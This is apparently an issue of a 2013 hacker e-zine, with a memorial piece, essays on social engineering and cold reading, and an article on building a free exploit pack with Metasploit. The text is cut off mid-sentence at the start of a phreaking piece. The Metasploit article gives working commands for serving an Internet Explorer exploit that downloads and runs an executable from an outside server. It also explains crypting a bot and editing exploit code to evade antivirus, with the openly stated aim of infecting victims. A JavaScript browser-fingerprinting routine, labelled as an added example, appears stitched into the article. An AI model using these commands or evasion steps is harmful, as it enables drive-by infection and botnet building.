South West Anarchy Team presents...
_.--""--._ _.--""--._
/ _ _ \ ###### ## ## ### ######## / _ _ \
_ ( (_\ /_) ) _ ## ## ## ## ## ## ## ## _ ( (_\ /_) ) _
{ \._\ /\ /_./ } ## ## ## ## ## ## ## { \._\ /\ /_./ }
/_"=-.}______{.-="_\ ###### ## ## ## ## ## ## /_"=-.}______{.-="_\
_ _.=("""")=._ _ ## ## ## ## ######### ## _ _.=("""")=._ _
(_'"_.-"`~~`"-._"'_) ## ## ## ## ## ## ## ## (_'"_.-"`~~`"-._"'_)
{_" "_} ###### ### ### ## ## ## {_" "_}
## ## ### ###### ### ######## #### ## ## ########
### ### ## ## ## ## ## ## ## ## ### ## ##
#### #### ## ## ## ## ## ## ## #### ## ##
## ### ## ## ## ## #### ## ## ## ## ## ## ## ######
## ## ######### ## ## ######### ## ## ## #### ##
## ## ## ## ## ## ## ## ## ## ## ### ##
## ## ## ## ###### ## ## ######## #### ## ## ########
\------------------------------------------------------------------------------/
ISSUE 42 - JUNE 2013
/------------------------------------------------------------------------------\
/--------------------------------------------\
| |
|"Do not meddle in the affairs of dragons, |
| for you are crunchy and good with ketchup" |
| |
|--------------------------------------------|
| Unknown |
\--------------------------------------------/
http://www.swateam.org
http://www.swateam.org.uk
firestarter@swateam.org.uk
12 years since the last release!!!!! Bloody hell how things have changed,
although I'm glad to say that the site has remained online. I did lose the old
.org domain but then after many, many years I finally got it back. So we now
squat at .org.uk and .org domains.
It's not to say that articles haven't been released during that time, although
not many, and there are more articles written and not released forever remaining
unfinished sat on a hard drive somewhere. But we're back, kinda.
Given this is the first magazine release in over a decade and the world has
changed, changed a lot and I don't want to wake up with an MP5 stuck in
my face, I'm sad to say that there won't be any more of the fun, dangerous,
absurd and downright entertaining articles on making explosives using nothing
more than a couple of ink cartridges and several boxes of matches.
Sad, I know but after all that terrorism bollocks over the years MI5 don't seem
to enjoy such things being released any more. But as you should all know you can
still find the old works on the site in the good ol' fashioned SWAT b00k!!
So, instead of sticking bomb making articles in there I figured that I'd turn
my hand to articles about survival and bushcraft. At least building traps and
other assorted survival goodies won't get me locked up, well it depends how big
I build them but you get the idea.
Anyhow, without further ado....
+------------------------------------------------------------------------------+
| Contents |
+---+--------------------------------------------------------------------------+
| # |Article title +++++++++++++++++++++++++++++++++++++++++++++ Author +++++++|
+---+--------------------------------------------------------------------------+
|00:|Introduction......................................... -=The Firestarter=- |
|01:|Mj - Our Friend...................................... -=The Firestarter=- |
|02:|First Thoughts.............................. Brakis & -=The Firestarter=- |
|03:|The Soft Touch of Social Engineering........................ Brakis |
|04:|Why You Are Important ...................................... Brakis |
|05:|Metasploit Exploit Pack.............................. -=The Firestarter=- |
|06:|The Art of Cold Reading..................................... Brakis |
|07:|You Were a Phreaker if you.................................. Brakis |
|08:|Rambles and Rants - Social Herding.......................... Briar |
|09:|Proactive Server Defence............................. -=The Firestarter=- |
|10:|Three Shades of Green, and The Viridian Design Movement .. -=The-Doh-Boy=-|
|11:|Fiction: Burnt by Burner.................................... davethefan |
|12:|Cover Yourself From Prism............................ -=The Firestarter=- |
|13:|Services and Daemons ................................ -=The Firestarter=- |
|14:|SWAT Magazine Info........................................................|
|15:|Wrap up and Disclaimer....................................................|
+---+--------------------------------------------------------------------------+
+------------------------------------------------------------------------------+
_.--""--._ ___________ __ ________________ |
/ _ _ \ / _____/ \ / \/ _ \__ ___/___ _____ _____ |
_ ( (_\ /_) ) _ \_____ \\ \/\/ / /_\ \| |_/ __ \\__ \ / \ |
{ \._\ /\ /_./ } / \\ / | \ |\ ___/ / __ \| Y Y \|
/_"=-.}______{.-="_\/_______ / \__/\ /\____|__ /____| \___ >____ /__|_| /|
_ _.=("""")=._ _ \/ \/ \/ \/ \/ \/ |
(_'"_.-"`~~`"-._"'_) Issue 42 - June 2013 |
{_" "_} http://www.swateam.org http://www.swateam.org.uk |
+------------------------------------------------------------------------------+
| Mj - Our Friend by -=The Firestarter=- |
+------------------------------------------------------------------------------+
It was May 3rd at 16:20 when Phreazoid got in touch with me and a few of the
others, it was to share the sad news that our old comrade and long time friend
Mj had passed away.
I have to say the news hit me hard, Mj was a good friend that I'd known for
years, back in SWAT's hey-day when we were at our peak and APT/Krash Magazine
were in the scene with us (Mj, Ody, Chicane, Exegency).
While it had been a while since I had spoken to Mj, he was always a familiar
friend that I could catch on IRC and chat to.
Over the years of meeting people in the scene chatting to them, bouncing ideas
around or just having a laugh I don't think you realise just how much the bond
between people and groups grow.
Here I was with this news that we'd lost one of our own, chatting with people
that I'd known for years albeit maybe not spoken to most of them for a very long
time, we were all as shocked as each other, the small community that we were
was still alive, and feeling the loss.
Then the conversations turned to the good old days, of people we knew and who
was in touch with who, so we could get the word out etc.
Hearing that you've lost a friend that was once part of your day to day life
isn't a good thing, but it does make you reflect on what you have now in your
life as well as looking back at the good times you shared.
Here we were, a group of people that hadn't spoken or seen much of each other
for a time, now all brought together under such tragic circumstances.
Mj will be missed, each and every one of us that knew him held respect for the
guy, a genuine hacker, he had knowledge, he helped people, he shared things.
He was person too, and a good one, while I never knew him outside of the
h/p scene many of the others did and the condolences for Mj, that many
have shared, are moving.
I must be honest I was very moved myself by the news and it was decided that in
his memory we would release commemorative issues of the old zines. So we got
the old crew together and decided to restart SWAT Magazine.
Mj, my friend, you will be missed dearly, your untimely and premature passing
has brought home just how mortal we all are, and that we should live our lives
to their fullest, as after all one day we must all pass on.
Mj I hope you knew just how popular you were with us all and I am proud to
say that I dedicate this, our best ever issue of SWAT Magazine to you.
You will never be forgotten and you will always be in our hearts and minds.
+------------------------------------------------------------------------------+
| First Thoughts |
+------------------------------------------------------------------------------+
The last time Swat released an issue, which was in November 2001, the world
was a very different place. Britain had a Labour government, you could be a
terrorist and not be Muslim, you could buy a pint of beer for under £2.00, we
were all excited about the turn of the millennium and the future seemed so full
of promise. You could get a credit card, loan or mortgage with very little to no
income. Drugs were more dangerous than legal highs, not the other way around.
The phone in my pocket now packs 5 times more computing power than was in my
beige desktop which ran Mandrake Linux and Windows 2000. The heady days of
prepay phones and dodgy guys in sheds chipping Philips Digas to get unlimited
calls.
Blah blah fucking blah........nobody gives a fuck, the important thing is that
after more years and failed attempts to get the ball rolling than we care to
count we have finally got our shit together and brought back the awesome mag
that was loved by so many back in the “oldsk00l” dayz. Don't worry though this
won't be like Star Wars where the latest installments are a lot of shite. This
zine is continuing where it left off only now we have a twelve year backlog of
accumulated knowledge to share with the masses. It was always our purpose to
publish any information to anyone in the spirit of freedom of the individual
and support your right to not let anyone else, apart from yourself, make
decisions for you. So in that spirit we bring you something we have all
(including those who wrote it) waited a long time for.
Boyz and Gurlz...Layd33z and G3n7lem3n
We iz proud to present SW4T 42
Luv Hugz and a big ol’ fuckin :D
Firestarter and Br4kis
(Who in the past 12 years have started a successful online florist based in
Devonshire, for that special occasion please visit www.yomamaspwettyflower.com)
+------------------------------------------------------------------------------+
| The Soft Touch of Social Engineering By Brakis |
+------------------------------------------------------------------------------+
This article is written in memory of MJ whose tragic and untimely passing is a
great loss to the Hacking community. Obviously to those that knew him personally
(whose number I cannot count myself amongst) his presence will be most painfully
missed. In tragedy there can often be some hope; as in the case of the feuding
or apathetic family who are brought out of hiding by a sudden bereavement, so is
the case with this community who in memory of a beloved friend feel it is time
to remind the world of what he and they did. The things we were interested in
and the values that we held.
It is in this spirit I would like to submit for your entertainment and
nostalgia...
The Soft Touch of Social Engineering By Brakis.
Social Engineering or human hacking has been around since humans first evolved
to communicate linguistically with each other and as such it is something that
you will have done either consciously or unconsciously at some point today.
Let me give you some examples of some subtle Social Engineering I have
undertaken today without thinking:
I threw a cat toy out of my bedroom so that the cat would chase it out, I didn't
want to play with her I just wanted her out of my bedroom.
The guy in Starfucks asked me how I was today, I told him I was well, I then
reciprocated by asking him how he was. The two of us couldn't give a shit about
how the other was. We have just become so familiar that we feel the need to
take part in an arbitrary conversation which really serves no purpose.
A colleague asked me what I did last night. My answer was simple and mundane,
not because I was doing anything secretive or subversive but the thing I was
actually doing was either so complicated and idiosyncratic or outside what we
call the norms of socially acceptable conversation that it wasn't worth my time
to explain the context which led to me undertaking the previous evening's
venture.
Consider the following:
Conversation 1 -with SRSE (subtle and routine social engineering)
Colleague: "What did you do last night mate?"
Brakis: "Ah fuck all mate, I watched family guy and had a pretty early night.
What about you?"
Colleague: "I just chilled out with the Mrs"
Brakis: "Cool"
Conversation 2 -Without SRSE
Colleague "What did you do last night mate?"
Brakis "Well I got home, planned to masturbate. I couldn't find a suitable whack
off video on pornhub because I have desensitized myself to porn over the last
fifteen or so years and I have pretty much killed my internal fantasy mechanism
and I actually find most porn pretty boring but I still compulsively watch it
because I can't undo that little bit of internal programming. Due to the fact
that I skipped lunch and was starving I ended up going to the take away and
getting a huge kebab which I later felt guilty about so I ended up doing hand
stand push ups against the wall in a tokenistic attempt to undo the damage from
the kebab. I felt pretty good after ten so I figured I would reward myself with
a wank so then I had the same problem which I had the first time. I then had a
successful wank to a tried and tested video on pornhub which made me wonder if I
have a more meaningful relationship with the woman in the video than with the
woman I am actually with. I decided I was over thinking so I spent most of the
rest of the evening trying to recompile my OS kernel so that the necessary
non-proprietary drivers for my wireless card would work, this makes me guilty
because I know that I really should be using free software for everything. I
also watched 3 episodes of Babylon 5 which I had seen countless times before...
also if you make a comment about hating Sci Fi then I will hate you forever.
I read a bit of a book that is too big and I think might make me smarter and
then went to bed. What about you mate?".....
You get the idea. In the 2nd example there is no deception, not by omission or
misinformation. This has a number of disadvantages. One being the
huge waste of time and productivity lost by such a conversation, never mind the
discomfort of such a conversation. The advantage of the 1st being that it
maintains the social fabric that we social engineers and human hackers can take
advantage of when the need or motivation arises.
Everyone wears a face which is on display all the time. It is a fusion of our
physical presence, our sense of self image and self esteem, how we perceive
ourselves in relation to others. It would be logical to surmise that this is an
innate or automatic reaction. Necessary both as a defence mechanism and as
utility for attraction (think about when you are trying to
attract the opposite sex).
Being mindful of these subtleties and innate abilities serves two core purposes
which are useful to the would be social engineer.
The first of these is that it makes you more aware of your own internal
dialogues and the noise that is in your head. Part of the fact is that a great
deal of our innate deception extends to ourselves as well. Yes, believe it or
not you lie to yourself! Again some of these are useful and some are not. This
in turn serves to make you better at social engineering as you are able to be
more tuned in to the little deceptions which ultimately make us better at what
we do.
The good social engineer must be aware of this, the subtle social engineering,
which makes up the fabric of most of our communication. Take for instance the
following example.
In 2005 myself and an associate had been contracted by a technology start up in
Europe to test their human infrastructure against social engineers, information
gatherers and the like. It became apparent to us that the scale of what was
required meant we would have to use extra help. We had a number of candidates
that were sought through both informal and formal contacts. One candidate
claimed to be a professional gambler who had a very effective track record in a
sales company. Sure enough his references and contacts seemed to stack up, he
had an interest in computers and wanted to get some experience of social
engineering (as part of the process we even went on a trip with him to the
casino so we could see his gambling success).
In the end we didn't take him on for this particular project because there was
something missing.
The thing that was missing was mindfulness of the subtleties of the
communication and that innate deception which continually takes place. He was a
successful salesman because he had learned patterns and ways of talking to
people which gained results. He was a successful gambler because he had learned
techniques which improved his odds and he had convinced himself that he was a
successful gambler. As is the case with most gambling the odds over the long run
could be read either positively or negatively. Due to the fact that he was not
aware of the organic way people communicate then he would find it more difficult
to think on his feet and in the case of this contract prove to be an ineffective
tester or perhaps even a liability. Patterns, techniques are highly useful and
can be very effective but they have a limit to what they can do and a more
intrinsic understanding is necessary. Simply to be a good social engineer it is
always more effective to pay attention to the minutiae of human communication
as it allows your innate abilities and awareness to increase. Thus making you
naturally better. Intuition can be fed!
The second core purpose is (perhaps in contrast to the first) the development of
micro-techniques that make you more effective when approaching your projects and
showing others how to do the same. At this point you might be asking "Hey Hey!!!
Mr Brakis Dude....you just told us that we want to gain an understanding of
innate communication and the subtleties of communication and avoid techniques
and patterns." Yes I did. The distinction between what you are trying to gain
and what our friend the gambling salesman has is that your techniques will be
unique to you and rooted in the underlying nature of communication. Not some
hackneyed technique from a book that may work 60% of the time but fails to take
into account that people are individuals with entirely different perceptions.
With this in mind I would like to invite you to try and be more mindful of the
small things about your communication. Try and keep a mental log of all the
little ways in which you are dishonest or lie by omission. Once you have done
that, figure out what the reason was. This will start you on the path to
becoming a more skilled, natural and intuitive social engineer.
Hack the human, hack the system.
Brakis 2013
All text contained within this article is intended solely for information and
entertainment purposes. Any legal action or prosecution which results from
anything taken from the article is entirely the responsibility of the reader and
the author takes no responsibility for any legal action, injury or death which
happens as a result of the actions of the reader. This disclaimer applies to all
articles, information and consultation provided by the author. This article
remains the intellectual property of the author. It may be redistributed freely
provided that the article remains intact and all credits, disclaimers and
copyright notices remain attached to the article.
+------------------------------------------------------------------------------+
| Why You Are Important By Brakis |
+------------------------------------------------------------------------------+
Why you are important.
I imagine if you are reading this then you are somebody who in some shape or
form attaches yourself to something that society perhaps looks down upon or
is threatened by.
You my friend, brother or sister are exactly what the world needs. Years ago my
friends and I explored computers and phone systems to gain an understanding of
what it is people didn’t want us to understand.
This is particularly poignant at this moment in time as the world is being
turned up on its head by revelations that privacy is a thing of the past and
that pretty much everything we say or do is being watched. I don’t think
personally this is that much of a surprise to anyone but I think that as our
liberty dies we are too complacent in doing nothing about it.
John Stuart Mill in his book 'On Liberty' talks a lot about how a healthy
society needs individuals to be innovative to develop, to allow for new ideas to
take hold and for people to grow and become better.
Think of all the positive things we have done and developed in the last twenty
years. We have the ability to communicate with people all over the world with
very little effort, we have unparalleled access to information. We have new
cooperative initiatives from people who genuinely want to make the world a
better place.
You are important because without people like you, people who strive, people who
love, people who know that we as a species deserve the world we want to live in.
Without people like you that change will never come. We will be dominated by
those who seek to keep the majority down, to keep everyone quiet to keep good
ideas out of the public eye.
You might be reading this and thinking “No way man. I’m not important! I am just
a.....” Well fuck that, you are important. You just don’t know how powerful you
are yet. You have done and will do great things which will come from a place of
genuine excitement and compassion and those that seek to keep you down either
because they are scared of what you can do, or because you remind them of what
they have not been brave enough to do themselves will be left behind in your
dust.
Ideas which make the world a better and more equal place come along like buses
(there is none for a while but then they all come at once). You have to step out
and be brave and graciously accept the experiences which have been given to you.
You are important because you are that individual that makes society innovative
which makes society better. Those brave, stupid, crazy ideas you have are what
is going to save us.....and the best part is you can’t do it alone....you need
the rest of us to make it work too.
Much love brothers and sisters.
Brakis.
All text contained within this article is intended solely for information and
entertainment purposes. Any legal action or prosecution which results from
anything taken from the article is entirely the responsibility of the reader and
the author takes no responsibility for any legal action, injury or death which
happens as a result of the actions of the reader. This disclaimer applies to all
articles, information and consultation provided by the author. This article
remains the intellectual property of the author. It may be redistributed freely
provided that the article remains intact and all credits, disclaimers and
copyright notices remain attached to the article.
+------------------------------------------------------------------------------+
| Metasploit Exploit Pack... By -=The Firestarter=- |
+------------------------------------------------------------------------------+
Exploit packs are bits of kit sold on the black market with one intention:
installing malware on unsuspecting victims using a variety of exploits, usually
delivered via the web browser.
They sell for thousands, well some do, some for a few hundred, and some for just
a few quid (although they are mostly very expensive).
Now as much as I'd love to wire a few grand over to some random Russian that
I've never met in order to get the latest and most evil piece of drive-by
installing software out there today, I am a bit of a cheapskate when it comes
to paying for things I can do myself.
Now I've several exploit packs in my possession, mostly downloaded from the far
flung corners of the internet, all of them pretty much outdated and likely to
fail on all but the least updated boxes that have the misfortune to be
connected to the internet.
The best exploit packs out there are very sophisticated in the way they work:
they use JavaScript to analyse the browser that has opened the landing page,
which is usually linked in from an innocent page on a cracked server via an
iframe.
It will look at what versions of Flash are installed, what versions of Java,
the operating system type, browser type, IP address etc.
All of this information gets stored in an SQL database and the pack will then
attempt to exploit the system.
The more sophisticated kits look at what versions of Flash, Java, etc are
installed and fire off only the exploits that are known to work on them; this
method has proven far more successful at exploiting machines than just firing
off everything the kit has onboard.
Given that exploit packs usually come with a handful of exploits, mainly
targeting things such as flash, java, adobe acrobat and the browser itself
and given the resources that the attack server has on board, it can be
quicker to get one or two exploits in rather than trying to shove every known
attack vector down the internet and onto some poor sod's machine.
Thus, if the pack sees you have a crappy never been updated since 2010 version
of flash player, it will fire off one of many exploits and get some shell code
injected in there, your machine will then proceed to download some executable
file from the server and run it.
Hey presto you're now part of someone's botnet :)
All very clever, you will now also be a statistic on the exploit packs web panel
showing how many machines have been hit, how many exploited and where you're
from (country) etc etc.
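As an added example (not code from this article, from any exploit pack, or from Metasploit), here's that targeting step written out in JavaScript: parse what the visiting browser volunteers, then serve only the exploits whose version table says they fit, rather than firing everything. The table holds the one real case used later in this article (IE 8 on Windows 7, CVE-2013-1347, module ie_cgenericelement_uaf); the 'exampleplugin' row and its module name are made up purely so the matcher is exercised against a plugin version as well as a browser version, and the visitor's user-agent string and plugin list are constructed sample input.

```javascript
// Added example for this article; not code from the SWAT zine, from any real
// exploit pack, or from Metasploit. It shows the targeting step the article
// describes: fingerprint the visiting browser, then pick only the exploits whose
// known-vulnerable range matches. Only the first table row is real (the case
// the article exploits); 'exampleplugin' and its module name are fictional.

// Windows NT versions as IE reports them in its User-Agent string.
const WINDOWS_NAMES = {
  '5.1': 'Windows XP', '6.0': 'Windows Vista', '6.1': 'Windows 7', '6.2': 'Windows 8',
};

// Compare dotted version strings ("11.7.700.202", "1.7.0_21"): -1, 0 or 1.
// Missing components count as 0, so "8" equals "8.0".
function compareVersions(a, b) {
  const pa = String(a).split(/[._]/).map(Number);
  const pb = String(b).split(/[._]/).map(Number);
  const n = Math.max(pa.length, pb.length);
  for (let i = 0; i < n; i++) {
    const x = pa[i] || 0;
    const y = pb[i] || 0;
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

// Pull the fields a kit cares about out of what the client volunteers.
// `plugins` is the version map a landing page would build with JavaScript
// (e.g. { flash: '10.0.45.2', java: '1.6.0_20' }). Unknowns stay null; the
// kit should skip rather than guess, because a wrong exploit just crashes IE.
function fingerprint(userAgent, plugins) {
  const ie = /MSIE (\d+(?:\.\d+)?)/.exec(userAgent);
  const nt = /Windows NT (\d+\.\d+)/.exec(userAgent);
  return {
    browser: ie ? 'IE' : null,
    browserVersion: ie ? ie[1] : null,
    os: nt ? (WINDOWS_NAMES[nt[1]] || 'Windows (unknown)') : null,
    plugins: plugins || {},
  };
}

// One row per (product, vulnerable range, OS targets) -> module to serve.
// `os: null` means the exploit does not care which Windows it is.
const EXPLOIT_TABLE = [
  { product: 'IE', min: '8.0', max: '8.0', os: ['Windows 7'],          // real: CVE-2013-1347
    module: 'exploit/windows/browser/ie_cgenericelement_uaf' },
  { product: 'exampleplugin', min: '0', max: '1.9.999', os: null,      // fictional placeholder
    module: 'placeholder/exampleplugin_old_versions' },
];

function inRange(version, min, max) {
  return compareVersions(version, min) >= 0 && compareVersions(version, max) <= 0;
}

// The selection the article credits with the better hit rate: return the modules
// whose table row matches this visitor, in table order, and nothing else.
function selectExploits(fp) {
  const chosen = [];
  for (const row of EXPLOIT_TABLE) {
    const version = row.product === fp.browser ? fp.browserVersion : fp.plugins[row.product];
    if (!version) continue;                               // product not present
    if (row.os && !row.os.includes(fp.os)) continue;      // no target for this OS
    if (inRange(version, row.min, row.max)) chosen.push(row.module);
  }
  return chosen;
}

// Constructed sample visitor, matching the "Target selected as: IE 8 on
// Windows 7" line in the msfconsole output later in this article (this is the
// User-Agent format IE 8 really sends).
const SAMPLE_UA = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)';
const visitor = fingerprint(SAMPLE_UA, { exampleplugin: '1.4.2', java: '1.7.0_21' });
console.log(selectExploits(visitor));
```

Two caveats worth keeping in mind: everything here comes from what the client volunteers (User-Agent, plugin version strings), so a browser that lies (IE 8 in compatibility view reports MSIE 7.0, and a sandbox can report anything) gets the wrong exploit or none at all; and a defender can turn the same table around, using the browser and plugin versions seen in proxy logs to work out which visitors to a known kit landing page were actually exploitable.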
But if we're wanting to save a bundle of cash and we're prepared to do without
the web panel and statistics - I mean lets face it, bots in the net are more
than enough of a statistic than what some exploit pack reports, then we can
utilise our favorite exploit framework and the trusty old eee pc to create
an adequate and updateable totally free of charge malware loading device. Yes
you too can be an evil genius with nothing more than time and a computer.
Ok, so how are we going to go about achieving this goal?
First off we are going to need a payload. For testing purposes we'll assume
that I want to load our latest version of Satanic Hoard (our testing bot we
coded in VB6 using elite ninja skills); however, like all great skid tools
it's detected by every anti-virus under the sun, thus we will run it through
one of our crypters and take the detection from 35/35 to 0/35. Yep, we are
now fully undetected (FUD), so all those noobs with out of date machines
running (probably out of date) anti-virus software will have a nice false
sense of security when we hijack their machines for evil purposes.
The next and more important step, actually probably more important than the
payload, is the exploit. Metasploit comes with a whole host of wonderful
methods with which to take ownership of unsuspecting machines, some more
relevant to our cause than others, and the great thing about Metasploit is its
ability to update itself to the latest and greatest exploits out there.
For this exercise I am going to make use of the awesome, and at time of writing
newest, Microsoft Internet Explorer CGenericElement Object Use-After-Free
Vulnerability, CVE-2013-1347 (patched by Microsoft as MS13-038). But you can
browse exploit-db.com and find your own latest and most awesome pentesting
codez, or be really elite and write your own - but that's another article for
another time.
Anyhow, let's get things going.
First off, let's start Metasploit:
./msfconsole
Now we set the exploit to be used:
msf > use exploit/windows/browser/ie_cgenericelement_uaf
Now we set the payload:
msf exploit(ie_cgenericelement_uaf) > set PAYLOAD windows/download_exec
PAYLOAD => windows/download_exec
Let's configure the payload:
msf exploit(ie_cgenericelement_uaf) > set URL http://www.swateam.org/a.exe
URL => http://www.swateam.org/a.exe
Set what the dropped file name on the target is:
msf exploit(ie_cgenericelement_uaf) > set EXE adobe.exe
EXE => adobe.exe
Now run it as a background job; the framework starts its web server and prints
the URL we need to get the target to open:
msf exploit(ie_cgenericelement_uaf) > exploit -j
[*] Exploit running as background job.
[*] Using URL: http://0.0.0.0:8080/2v8xriE8VXZsONY
[*] Local IP: http://192.168.1.10:8080/2v8xriE8VXZsONY
[*] Server started.
Ok let's test it out, we browse to that URL from the target box (IE 8 on
Windows 7) and what do we get...
msf exploit(ie_cgenericelement_uaf) > [*] 192.168.1.4 ie_cgenericelement_uaf - Requesting: /2v8xriE8VXZsONY
[*] 192.168.1.4 ie_cgenericelement_uaf - Requesting: /2v8xriE8VXZsONY
[*] 192.168.1.4 ie_cgenericelement_uaf - Target selected as: IE 8 on Windows 7
[*] 192.168.1.4 ie_cgenericelement_uaf - Sending HTML...
Ok, looks good on the attack side of things, but what happens on the target
side of things?
Well, AVG goes mental and starts crying about a virus!!! Oh no, it's detected
the exploit's evil attempts to lay down the pwn on windoze, we can't be having
that interfering with our attempts at world domination.
First step, let's find out what's tripping things: on the target, go to the
browser's web cache, acquire the webpage that tripped the alert and save the
contents to a text file.
Now let's look through the code and see what could have caused the problem. To
check this over, what we're going to do is create a new .html file, we'll call
it test1.html, and we're going to paste in a block of text at a time, save it
and scan it to find out what's causing the issues.
let's begin at the top...
We'll enter the first dozen or so lines into it:
function mstime_malloc(oArg) {
shellcode = oArg.shellcode;
offset = oArg.offset;
heapBlockSize = oArg.heapBlockSize;
objId = oArg.objId;
Look dodgy don't they? Paste, save and scan.
Nothing found, ok let's move on and we'll add the next dozen or so lines into
it. Those bits that look like:
e = document.getElementById(objId);
if (e == null) {
eleId = "ZXBvS"
acTag = ""
document.body.innerHTML = document.body.innerHTML + acTag;
e = document.getElementById(eleId);
}
try { e.values = buf; }
catch (e) {}
}
function helloWorld()
{
sparkle = unescape("ABCD");
for (i=0; i < 2; i++) {
sparkle += unescape("ABCD");
They come before that nasty-looking block of code. Paste, save and scan.
Still nothing!?!?!?!
Ok, we'll paste in the HUGE block of unescape code; that's gotta be bad ass and
nasty.
Still nothing! OMG, am I doing it right? Now let's add the information just below
that block of code, all those f0 = document.createElement sections, then save
and scan.
Bingo, evil virus detected!!! I'd paste the code, but I remember when we
released the iloveyouvirus and we had a fuckload of lamers complaining that we'd
infected the txt documents with virii and were trying to infect people. Fuckin'
noobs.
Anyhow, now we've located the section of code that's tripped the scanner, so what
we need to do is change it a little so that our exploit slips past and allows us
to infect the target box.
So what we now need to do is locate the exact part of the code that's making AVG
throw a hissy fit.
For this we create a document and paste ONE line at a time of the offending
block, save and scan, slowly building up the offending block line by line.
What do we notice? We notice that the line that says "collectgarbage" trips
things, so we test this by putting JUST that line in a file, save and scan:
nothing. We try it with the rest, and it sets it off.
So now we paste the remaining block of text into the file BUT remove the
trigger line, save and scan: nothing found.
So we know we have to change that line, or at the very least the parts around
it.
Since collectgarbage is actually part of JavaScript itself we can't just
rename it along with whatever calls it, so we shall try some k-rad codez to
make it appear slightly different.
What shall we do? We'll try adding a comment on the line above it:
//test//
Save and scan. Nothing found! Perfect, so now all we need to do is alter the
main module in Metasploit to ensure we always have a FUD attack to carry out
on poor unsuspecting victims.
So we go:
cd /opt/metasploit-framework/modules/exploits/windows/browser/
nano ie_cgenericelement_uaf.rb
Scroll down to the offending line (264), add in the comment and save.
You can do this to several of the top exploits and get each one running in its
own directory, then simply open up an iframe to them. If the browser hitting
the sites doesn't carry the correct version etc. then Metasploit will return
a 404, or at least it does with the ie_cgenericelement_uaf exploit.
This simple strategy will work with many, many exploits; it also shows just how
easy it is to rip them from Metasploit for your own evil means.
If you wish to add more exploits simply repeat the above steps until you have
half a dozen or so exploits running away in the background on various URLs and
either have them all opened via iframes on a page or, if you feel really special,
whack up some JavaScript to fire victims at the relevant exploits. The
world is your oyster!
+------------------------------------------------------------------------------+
_.--""--._ ___________ __ ________________ |
/ _ _ \ / _____/ \ / \/ _ \__ ___/___ _____ _____ |
_ ( (_\ /_) ) _ \_____ \\ \/\/ / /_\ \| |_/ __ \\__ \ / \ |
{ \._\ /\ /_./ } / \\ / | \ |\ ___/ / __ \| Y Y \|
/_"=-.}______{.-="_\/_______ / \__/\ /\____|__ /____| \___ >____ /__|_| /|
_ _.=("""")=._ _ \/ \/ \/ \/ \/ \/ |
(_'"_.-"`~~`"-._"'_) Issue 42 - June 2013 |
{_" "_} http://www.swateam.org http://www.swateam.org.uk |
+------------------------------------------------------------------------------+
| The Art of Cold Reading by Brakis. |
+------------------------------------------------------------------------------+
Has there ever been a time when you, as a natural skeptic, have looked at someone
and thought that they had an above average awareness of what was going on around
them? Perhaps someone who appears to grasp things that you do not, or perhaps has
a deeper understanding of people.
Perhaps you have seen a psychic and been amazed by the level of accuracy of the
predictions they are able to draw out of thin air, in spite of knowing in your
heart of hearts that there are no such things as psychics.
This is true for soothsayers, psychics and any other jack ass who claims to be
able to see into the future.
There are a couple of techniques which I will discuss here that will give you
some idea of how cold reading can be applied. I will also give you a skeleton
outline of how these techniques can be used in any setting.
Essential to the understanding of cold reading is the ability to realise that
people are essentially patterned creatures, although you should never make too
many assumptions about anyone: when cold reading (or attempting to ascertain if
someone is cold reading) a fairly healthy dose of common sense must prevail.
Let me give you a fairly standard example. If you think of a psychic medium, who
is able to talk to the dead, what this person will be doing is finding a
willing volunteer (it is safe to assume that people that have
paid to sit in a room and listen to somebody that talks to ghosts in fact have
the desire themselves to get in touch with someone who has died).
The medium will then proceed to use a technique called shotgunning (this
doesn't mean cutting the audience down with a sawn-off). This involves using a
series of probability guesses until someone in the audience responds.
M is for Medium, A plus a number refers to an audience member. The commentary in
brackets is mine.
M: I am sensing something coming through....someone.....oh it's a female whose
name begins with an M or an S?
A1: Oooh yes.
M: You knew a woman whose name begins with an M (how many fucking women are
there with a name that begins with the letter M)
A1: Yes, my mother, Margaret (so now the stupid bitch has just told the medium
everything he needs to know, and the amount of supposedly correct guesses this
guy can make will quickly get the woman's hopes up and probably empty her
pockets too).
There are a number of assumptions that you can make about A1, such as: her mother
has died; her relationship with her mother had some quirk, for example they
used to be close but something happened; A1 wasn't there for the death of her
mother; there was something she wanted to tell her but didn't have the chance.
It is also easy to make assumptions based on the kind of woman that A1 is (she
may also be a man), and many of the things that cannot be ascertained from her
appearance or actions can be guessed at with a binary fifty-fifty guess.
Link this with the fact that the audience members are looking for answers and
you have a perfect set up.
Cold reading can be used in a number of different situations. To become super
elite at cold reading you have to start to notice people's little tells (like in
poker); people give away so much from how they walk, how they act and the
things they say in jest. Cold reading, as with all aspects of social engineering,
can seem somewhat daunting at first. The trouble I find when getting deep into
social engineering techniques is that I worry I will overthink what I am doing
and lose sight of what my objective is. My advice is to relax and not stress too
much about figuring everything out at once. You can start small and as long
as you keep certain principles in mind then you will be able to get a better
reading as you practice. You are human and the subject you are trying to cold
read will be human, so trust that you will get a better understanding as time
goes on. To an extent it becomes second nature. It becomes innate and before you
know it, you can get an accurate read on people before they have even said a
word.
As for the ethics of cold reading: as I have demonstrated it can be used for
fraud, however do not be too hard on the poor medium, because some of these poor
dolts actually think they can speak to the dead and have no idea that what they
are actually doing is cold reading. It is always important to stay cautious when
dealing with anyone for the first time. So let cold reading be your ally.
Brakis 2013
All text contained within this article is intended solely for information and
entertainment purposes. Any legal action or prosecution which results from
anything taken from the article is entirely the responsibility of the reader and
the author takes no responsibility for any legal action, injury or death which
happens as a result of the actions of the reader. This disclaimer applies to all
articles, information and consultation provided by the author. This article
remains the intellectual property of the author. It may be redistributed freely
provided that the article remains intact and all credits, disclaimers and
copyright notices remain attached to the article.
+------------------------------------------------------------------------------+
_.--""--._ ___________ __ ________________ |
/ _ _ \ / _____/ \ / \/ _ \__ ___/___ _____ _____ |
_ ( (_\ /_) ) _ \_____ \\ \/\/ / /_\ \| |_/ __ \\__ \ / \ |
{ \._\ /\ /_./ } / \\ / | \ |\ ___/ / __ \| Y Y \|
/_"=-.}______{.-="_\/_______ / \__/\ /\____|__ /____| \___ >____ /__|_| /|
_ _.=("""")=._ _ \/ \/ \/ \/ \/ \/ |
(_'"_.-"`~~`"-._"'_) Issue 42 - June 2013 |
{_" "_} http://www.swateam.org http://www.swateam.org.uk |
+------------------------------------------------------------------------------+
| You Were a Phreaker if you... By Brakis |
+------------------------------------------------------------------------------+
Unfortunately it is very sad to admit, brothers and sisters, but our phreaking
